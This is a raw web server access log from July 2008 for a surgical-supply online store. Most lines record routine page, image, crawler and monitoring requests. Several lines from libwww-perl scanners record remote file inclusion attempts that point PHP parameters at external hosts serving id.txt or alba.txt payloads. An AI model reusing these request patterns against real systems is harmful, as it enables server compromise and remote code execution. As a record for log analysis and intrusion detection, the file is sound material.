76.88.23.120 - - [10/Jul/2008:02:26:00 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F9A0E2969C139008DB406I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
76.88.23.120 - - [10/Jul/2008:02:26:00 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F9A0E2969C139008DB406I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
76.88.23.120 - - [10/Jul/2008:02:26:00 -0400] "GET /images/cat_collapse.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F9A0E2969C139008DB406I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
76.88.23.120 - - [10/Jul/2008:02:26:02 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L2F9A0E2F6E418900915406I+M37+ENG HTTP/1.1" 200 58793 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F9A0E2969C139008DB406I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
76.88.23.120 - - [10/Jul/2008:02:26:05 -0400] "GET /images/pf-a.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F9A0E2F6E418900915406I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
76.88.23.120 - - [10/Jul/2008:02:26:05 -0400] "GET /images/space.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F9A0E2F6E418900915406I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
76.88.23.120 - - [10/Jul/2008:02:26:05 -0400] "GET /images/next.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F9A0E2F6E418900915406I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
85.234.133.173 - - [10/Jul/2008:02:26:12 -0400] "GET /logs//ashnews.php?pathtoashnews=http://evro-set.ru/modules/id.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.811"
85.234.133.173 - - [10/Jul/2008:02:26:12 -0400] "GET //ashnews.php?pathtoashnews=http://evro-set.ru/modules/id.txt?? HTTP/1.1" 404 210 "-" "libwww-perl/5.811"
76.88.23.120 - - [10/Jul/2008:02:26:17 -0400] "GET /images/items/ALLOOSS2_THUMB.JPG HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F9A0E2E64D17900758406I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
76.88.23.120 - - [10/Jul/2008:02:26:17 -0400] "GET /images/items/ALLOOSS1_THUMB.JPG HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F9A0E2E64D17900758406I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
209.59.12.99 - - [10/Jul/2008:02:30:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [10/Jul/2008:02:35:51 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.241.147.40 - - [10/Jul/2008:02:40:49 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
203.241.147.40 - - [10/Jul/2008:02:40:49 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
209.59.12.99 - - [10/Jul/2008:02:40:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.241.147.40 - - [10/Jul/2008:02:40:55 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
203.241.147.40 - - [10/Jul/2008:02:40:55 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
203.241.147.40 - - [10/Jul/2008:02:40:56 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
203.241.147.40 - - [10/Jul/2008:02:40:56 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
203.241.147.40 - - [10/Jul/2008:02:41:00 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
203.241.147.40 - - [10/Jul/2008:02:41:00 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
203.241.147.40 - - [10/Jul/2008:02:41:14 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
203.241.147.40 - - [10/Jul/2008:02:41:14 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
203.241.147.40 - - [10/Jul/2008:02:41:15 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
203.241.147.40 - - [10/Jul/2008:02:41:15 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
203.241.147.40 - - [10/Jul/2008:02:41:25 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 75525 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
203.241.147.40 - - [10/Jul/2008:02:41:27 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
203.241.147.40 - - [10/Jul/2008:02:41:27 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
203.241.147.40 - - [10/Jul/2008:02:41:27 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
203.241.147.40 - - [10/Jul/2008:02:41:27 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
203.241.147.40 - - [10/Jul/2008:02:41:27 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
203.241.147.40 - - [10/Jul/2008:02:41:27 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
203.241.147.40 - - [10/Jul/2008:02:41:27 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
203.241.147.40 - - [10/Jul/2008:02:41:27 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
203.241.147.40 - - [10/Jul/2008:02:41:27 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
203.241.147.40 - - [10/Jul/2008:02:41:27 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
203.241.147.40 - - [10/Jul/2008:02:41:27 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
203.241.147.40 - - [10/Jul/2008:02:41:27 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
203.241.147.40 - - [10/Jul/2008:02:41:27 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
203.241.147.40 - - [10/Jul/2008:02:41:27 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
203.241.147.40 - - [10/Jul/2008:02:41:28 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
203.241.147.40 - - [10/Jul/2008:02:41:30 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
203.241.147.40 - - [10/Jul/2008:02:41:30 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
203.241.147.40 - - [10/Jul/2008:02:41:30 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
203.241.147.40 - - [10/Jul/2008:02:41:33 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
203.241.147.40 - - [10/Jul/2008:02:41:33 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
203.241.147.40 - - [10/Jul/2008:02:41:34 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
203.241.147.40 - - [10/Jul/2008:02:41:34 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
203.241.147.40 - - [10/Jul/2008:02:41:34 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
203.241.147.40 - - [10/Jul/2008:02:41:34 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
203.241.147.40 - - [10/Jul/2008:02:41:34 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
203.241.147.40 - - [10/Jul/2008:02:41:34 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
203.241.147.40 - - [10/Jul/2008:02:41:34 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
203.241.147.40 - - [10/Jul/2008:02:41:34 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
203.241.147.40 - - [10/Jul/2008:02:41:34 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
203.241.147.40 - - [10/Jul/2008:02:41:38 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
203.241.147.40 - - [10/Jul/2008:02:41:40 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
203.241.147.40 - - [10/Jul/2008:02:41:40 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
203.241.147.40 - - [10/Jul/2008:02:41:40 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
203.241.147.40 - - [10/Jul/2008:02:41:40 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
203.241.147.40 - - [10/Jul/2008:02:41:40 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
203.241.147.40 - - [10/Jul/2008:02:41:49 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
203.241.147.40 - - [10/Jul/2008:02:41:49 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
203.241.147.40 - - [10/Jul/2008:02:41:51 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
203.241.147.40 - - [10/Jul/2008:02:41:51 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
66.249.72.1 - - [10/Jul/2008:02:45:02 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0F0FD6262691C1009E03061+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
217.160.189.11 - - [10/Jul/2008:02:45:11 -0400] "GET /?sourcedir=http://www.unixserv.net/alba.txt? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
217.160.189.11 - - [10/Jul/2008:02:45:05 -0400] "GET /logs/?sourcedir=http://www.unixserv.net/alba.txt? HTTP/1.1" 200 24059 "-" "libwww-perl/5.805"
66.249.72.1 - - [10/Jul/2008:02:45:12 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L2F61282A25D1A30031C4005+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [10/Jul/2008:02:45:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.72.1 - - [10/Jul/2008:02:48:03 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0F990A2564319900A0A4066+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.1 - - [10/Jul/2008:02:49:39 -0400] "GET /logs/error_log.Q107100600 HTTP/1.1" 200 22844 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
86.109.103.189 - - [10/Jul/2008:02:49:39 -0400] "GET /logs//accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.addhelium.com/community//plugins/safehtml/id.txt? HTTP/1.1" 404 228 "-" "libwww-perl/5.79"
86.109.103.189 - - [10/Jul/2008:02:49:39 -0400] "GET //accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.addhelium.com/community//plugins/safehtml/id.txt? HTTP/1.1" 404 223 "-" "libwww-perl/5.79"
209.59.12.99 - - [10/Jul/2008:02:50:49 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.72.1 - - [10/Jul/2008:02:52:49 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L5F52992727210500783408N+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
208.115.34.17 - - [10/Jul/2008:02:54:00 -0400] "GET /logs//accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.addhelium.com/community//plugins/safehtml/id.txt? HTTP/1.1" 404 228 "-" "libwww-perl/5.810"
208.115.34.17 - - [10/Jul/2008:02:54:01 -0400] "GET //accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.addhelium.com/community//plugins/safehtml/id.txt? HTTP/1.1" 404 223 "-" "libwww-perl/5.810"
209.59.12.99 - - [10/Jul/2008:02:55:53 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.72.1 - - [10/Jul/2008:02:56:46 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0F990A2564710900AEA4066+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [10/Jul/2008:03:00:53 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.72.1 - - [10/Jul/2008:03:01:19 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0F990A2563B1D900ABA4066+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
202.39.48.108 - - [10/Jul/2008:03:02:50 -0400] "GET /index2.php?p=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt?%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.65"
202.39.48.108 - - [10/Jul/2008:03:02:50 -0400] "GET /logs/index2.php?p=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt?%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.65"
66.249.72.1 - - [10/Jul/2008:03:05:53 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0F990A256451A900AAA4066+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [10/Jul/2008:03:08:07 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.72.1 - - [10/Jul/2008:03:10:28 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0F990A2564012900ABA4066+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.6.18.219 - - [10/Jul/2008:03:11:41 -0400] "GET /logs/error_log.Q107062400 HTTP/1.0" 200 170476 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
211.106.136.7 - - [10/Jul/2008:03:12:05 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 75525 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
211.106.136.7 - - [10/Jul/2008:03:12:14 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
211.106.136.7 - - [10/Jul/2008:03:12:14 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
211.106.136.7 - - [10/Jul/2008:03:12:14 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
211.106.136.7 - - [10/Jul/2008:03:12:14 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
211.106.136.7 - - [10/Jul/2008:03:12:14 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
211.106.136.7 - - [10/Jul/2008:03:12:14 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
211.106.136.7 - - [10/Jul/2008:03:12:14 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
211.106.136.7 - - [10/Jul/2008:03:12:14 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
211.106.136.7 - - [10/Jul/2008:03:12:14 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
211.106.136.7 - - [10/Jul/2008:03:12:14 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
